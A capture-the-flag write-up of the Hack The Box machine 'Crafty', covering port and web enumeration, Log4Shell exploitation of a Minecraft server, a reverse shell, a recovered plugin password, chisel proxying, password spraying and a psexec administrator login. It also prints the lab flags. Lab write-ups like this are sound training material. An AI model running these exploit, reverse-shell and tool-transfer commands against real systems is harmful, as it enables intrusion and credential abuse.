Owned Crafty from Hack The Box!
I have just owned machine Crafty from Hack The Box
Nmap Results
# Nmap 7.94SVN scan initiated Mon Feb 12 16:23:27 2024 as: nmap -Pn -p- -sT --min-rate 2000 -A -oN nmap.txt 10.10.11.249
Nmap scan report for 10.10.11.249
Host is up (0.011s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://crafty.htb
25565/tcp open minecraft Minecraft 1.16.5 (Protocol: 127, Message: Crafty Server, Users: 0/100)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 10.33 ms 10.10.14.1
2 10.52 ms 10.10.11.249
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Feb 12 16:24:48 2024 -- 1 IP address (1 host up) scanned in 81.07 seconds💡
Note the HTTP redirect to
http://crafty.htb. Let's go ahead and add that to our /etc/hosts file.echo '10.10.11.249 crafty.htb' | sudo tee -a /etc/hostsService Enumeration
TCP/80
Let's also add play.crafty.htb to our /etc/hosts file while we're here.
echo '10.10.11.249 play.crafty.htb' | sudo tee -a /etc/hosts
Gobuster Enumeration
Directory and File Enumeration
gobuster dir -u http://crafty.htb -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,asp,aspx,txt -o gobuster-80.txt -t 100/Index.html (Status: 301) [Size: 145] [--> http://crafty.htb/home]
/Home (Status: 200) [Size: 1826]
/coming-soon.html (Status: 301) [Size: 152] [--> http://crafty.htb/coming-soon]
/coming-soon (Status: 200) [Size: 1206]
/css (Status: 301) [Size: 145] [--> http://crafty.htb/css/]
/home (Status: 200) [Size: 1826]
/img (Status: 301) [Size: 145] [--> http://crafty.htb/img/]
/index.html (Status: 301) [Size: 145] [--> http://crafty.htb/home]
/js (Status: 301) [Size: 144] [--> http://crafty.htb/js/]crafty.htb
gobuster dir -u http://play.crafty.htb -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,asp,aspx,txt -o gobuster-80.txt -t 100 --exclude-length 140
/Index.html (Status: 301) [Size: 150] [--> http://play.crafty.htb/home]
/Home (Status: 200) [Size: 1826]
/coming-soon.html (Status: 301) [Size: 157] [--> http://play.crafty.htb/coming-soon]
/coming-soon (Status: 200) [Size: 1206]
/home (Status: 200) [Size: 1826]
/index.html (Status: 301) [Size: 150] [--> http://play.crafty.htb/home]play.crafty.htb
Virtual Host Enumeration
gobuster vhost -k --domain crafty.htb --append-domain -u http://10.10.11.249 -w /usr/share/dnsrecon/subdomains-top1mil.txt -t 100 -o vhost.txt --exclude-length 334No additional virtual hosts found.
TCP/25565
Researching the Minecraft Version
minecraft 1.16.5 exploit - Google Search
This official Minecraft help article also seems to indicate the existence of a Log4J vulnerability for this version of Minecraft.
minecraft log4shell exploit site:github.com - Google Search
GitHub - kozmer/log4j-shell-poc: A Proof-Of-Concept for the CVE-2021-44228 vulnerability.
A Proof-Of-Concept for the CVE-2021-44228 vulnerability. - GitHub - kozmer/log4j-shell-poc: A Proof-Of-Concept for the CVE-2021-44228 vulnerability.
kozmer‼️
This machine is frustrating in the fact that we need a Minecraft launcher to act as a client in order to run the exploit. The official Minecraft launcher requires a Microsoft account and third-party launchers such as
Just be aware of this prerequisite going into the challenge. I'd encourage you to take a snapshot of your machine and roll back once you've completed this box.
TLauncher are a bit sketchy (even if they're adamant about being spyware/malware free).Just be aware of this prerequisite going into the challenge. I'd encourage you to take a snapshot of your machine and roll back once you've completed this box.
Install Minecraft Launcher
wget https://tlauncher.org/jar -O TLauncher.zip
unzip TLauncher.zip
java -jar ./TLauncher-2.895.jar
ℹ️
Once the installation is complete, TLauncher will exit and relaunch Minecraft
1.16.5.
Exploit
Host the Malicious Java Class
This exploit works by causing the Minecraft server to reach out to our LDAP server and read and execute our malicious Java code over the network.
🔗
You'll also need to download some Java libraries to run the exploit: https://www.oracle.com/webapps/redirect/signon?nexturl=https://download.oracle.com/otn/java/jdk/8u20-b26/jdk-8u20-linux-x64.tar.gz
This requires an Oracle account to download. I already had one before working on this box.
This requires an Oracle account to download. I already had one before working on this box.
git clone https://github.com/kozmer/log4j-shell-poc
cd log4j-shell-poc
python3 -m pip install -r requirements.txtOnce you've downloaded the jdk archive to the working directory, extract it.
tar -xzvf jdk-8u20-linux-x64.tar.gzWe need to update the poc.py script, as it's written to run /bin/sh through a Java socket. Run nano.poc.py, And, change line 26 to powershell.exe.
Now, host the exploit files.
python3 poc.py --userip 10.10.14.15 --webport 8000 --lport 443And, start a listener
sudo rlwrap nc -lnvp 443Finally, press the t key to bring up the chat window and run the exploit on the target.
Post-Exploit Enumeration
Operating Environment
OS & Kernel
Host Name: CRAFTY
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00521-62775-AA944
Original Install Date: 4/10/2020, 9:48:06 AM
System Boot Time: 2/14/2024, 7:28:04 AM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
[02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version: VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,296 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 2,644 MB
Virtual Memory: In Use: 2,155 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\CRAFTY
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.11.249
[02]: fe80::9bc2:3118:f102:a65f
[03]: dead:beef::a97c:137d:be30:771e
[04]: dead:beef::224
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Current User
USER INFORMATION
----------------
User Name SID
==================== ==============================================
crafty\svc_minecraft S-1-5-21-4088429403-1159899800-2753317549-1002
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Users and Groups
Local Users
Name Enabled Description
---- ------- -----------
Administrator True Built-in account for administering the computer/domain
DefaultAccount False A user account managed by the system.
Guest False Built-in account for guest access to the computer/domain
jacob True
svc_minecraft True
WDAGUtilityAccount False A user account managed and used by the system for Windows Defender Application Guard scen...
Local Groups
Name Description
---- -----------
Access Control Assistance Operators Members of this group can remotely query authorization attributes and permission...
Administrators Administrators have complete and unrestricted access to the computer/domain
Backup Operators Backup Operators can override security restrictions for the sole purpose of back...
Certificate Service DCOM Access Members of this group are allowed to connect to Certification Authorities in the...
Cryptographic Operators Members are authorized to perform cryptographic operations.
Device Owners Members of this group can change system-wide settings.
Distributed COM Users Members are allowed to launch, activate and use Distributed COM objects on this ...
Event Log Readers Members of this group can read event logs from local machine
Guests Guests have the same access as members of the Users group by default, except for...
Hyper-V Administrators Members of this group have complete and unrestricted access to all features of H...
IIS_IUSRS Built-in group used by Internet Information Services.
Network Configuration Operators Members in this group can have some administrative privileges to manage configur...
Performance Log Users Members of this group may schedule logging of performance counters, enable trace...
Performance Monitor Users Members of this group can access performance counter data locally and remotely
Power Users Power Users are included for backwards compatibility and possess limited adminis...
Print Operators Members can administer printers installed on domain controllers
RDS Endpoint Servers Servers in this group run virtual machines and host sessions where users RemoteA...
RDS Management Servers Servers in this group can perform routine administrative actions on servers runn...
RDS Remote Access Servers Servers in this group enable users of RemoteApp programs and personal virtual de...
Remote Desktop Users Members in this group are granted the right to logon remotely
Remote Management Users Members of this group can access WMI resources over management protocols (such a...
Replicator Supports file replication in a domain
Storage Replica Administrators Members of this group have complete and unrestricted access to all features of S...
System Managed Accounts Group Members of this group are managed by the system.
Users Users are prevented from making accidental or intentional system-wide changes an...
Network Configurations
Network Interfaces
InterfaceAlias : Ethernet0
InterfaceIndex : 12
InterfaceDescription : vmxnet3 Ethernet Adapter
NetProfile.Name : Network 6
IPv6Address : dead:beef::a97c:137d:be30:771e
dead:beef::224
IPv4Address : 10.10.11.249
IPv6DefaultGateway : fe80::250:56ff:feb9:89e0
IPv4DefaultGateway : 10.10.10.2
DNSServer : 127.0.0.1
8.8.8.8
Open Ports
LocalAddress LocalPort RemoteAddress RemotePort State AppliedSetting
------------ --------- ------------- ---------- ----- --------------
:: 49668 :: 0 Listen
:: 49667 :: 0 Listen
:: 49666 :: 0 Listen
:: 49665 :: 0 Listen
:: 49664 :: 0 Listen
:: 25565 :: 0 Listen
:: 445 :: 0 Listen
:: 135 :: 0 Listen
:: 80 :: 0 Listen
0.0.0.0 49668 0.0.0.0 0 Listen
0.0.0.0 49667 0.0.0.0 0 Listen
0.0.0.0 49666 0.0.0.0 0 Listen
0.0.0.0 49665 0.0.0.0 0 Listen
0.0.0.0 49664 0.0.0.0 0 Listen
10.10.11.249 139 0.0.0.0 0 Listen
0.0.0.0 135 0.0.0.0 0 Listen
Interesting Files
C:\Users\svc_minecraft\server\plugins\playercounter-1.0-SNAPSHOT.jar
When I first came across this file, I didn't think much of it, but looking at C:\inetpub\wwwroot\index.html, I could see the 1277 players string was hard-coded in. So, why have this plugin if it's not doing anything?
Privilege Escalation
Inspecting the Minecraft Plugin
As mentioned in my post-exploit enumeration, why have the C:\Users\svc_minecraft\server\plugins\playercounter-1.0-SNAPSHOT.jar plugin if it's not doing anything? The player count of 1277 is hard-coded in the index.html file.
I have a PowerShell module called PSToolbox over on GitHub with some useful tools, one of them being a script to dump strings from a file.
PSToolbox/Public/ps1/Get-StringsFromFile.ps1 at master · 0xBEN/PSToolbox
PowerShell module containing a set of generally useful tools. - 0xBEN/PSToolbox
0xBENThe output isn't beautiful, but it's helpful enough to find something interesting. This plugin is custom built for this server, with lots of mentions of crafty throughout.
Let's transfer the .jar file to Kali and inspect it using jd-gui. I'll be using the web method and Apache running on Kali to transfer the file.
File Transfer Techniques | 0xBEN | Notes
TFTP
If the target has a TFTP client installed, Metasploit has a TFTP server you can run ad-hoc on…
Decompiling the JAR File
sudo apt install -y jd-gui jadxjd-gui ./playercounter-1.0-SNAPSHOT.jar
Poking through the code, this particular bit sticks out to me, s67u84zKq8IXw looks like it might be a password of some kind.
We need to figure out more about the Rcon class, as by inspecting it, we can understand what the arguments are for creating a class. 127.0.0.1 is obviously an IP, 27015 is most likely a TCP port, and s67u84zKq8IXw is unknown, but seems like a password.
Expand net.kronos.rkon.core, click on Rcon.class, and let's explore. We can quite easily find out answer. The Rcon takes three arguments — host, port, and password. So, this plugin attempts to make a connection to tcp/27015 on 127.0.0.1 using the password s67u84zKq8IXw.
You'll recall however that tcp/27015 was not in the list of bound ports in our post-exploit enumeration. But, perhaps we can reuse this password with one of the active accounts on the system. Looking at our post-exploit enumeration, this could be:
Administratorjacob- Or,
svc_minecraft
Proxied Password Spraying
Reverse SOCKS5 Proxy
Port Forwarding with C... | 0xBEN | Notes
GitHub
Download from the Releases Page Usage
Requires a copy of the Chisel binary on: The ta…
wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_linux_amd64.gz -O chisel.gz
wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_windows_amd64.gz -O chisel.exe.gz
gunzip chisel*.gz
chmod u+x ./chiselDownload and extract the chisel binaries
sudo ./chisel server --port 8081 --reverse &Start the chisel server on Kali
sudo python3 -m http.server 80Host chisel.exe over HTTP
cd ~\Downloads
iwr http://10.10.14.15/chisel.exe -o chisel.exeDownload chisel.exe to the target
$scriptBlock = { Start-Process ~\Downloads\chisel.exe -ArgumentList @('client','10.10.14.15:8081','R:5555:socks') }
Start-Job -ScriptBlock $scriptBlockStart chisel.exe in the background and open tcp/5555 on Kali as a reverse SOCKS5 proxy
sudo nano /etc/proxychains4.conf
echo -e 'Administrator\njacob\nsvc_minecraft' > users.txtCreate a list of users
proxychains -q crackmapexec smb crafty.htb --local-auth -u users.txt -p 's67u84zKq8IXw'Spray the password through the proxy
Escalate to Administrator
Pass the Password | 0xBEN | Notes
Overview
Cracked a hash or discovered a password for a domain user. Use the password and crackmapex…
proxychains -q impacket-psexec 'CRAFTY/Administrator:s67u84zKq8IXw@crafty.htb'
Flags
User
9f5ec297012a8786d692ca2382e125e2
Root
36c89b3d7873707c237fc4b0fc45c036
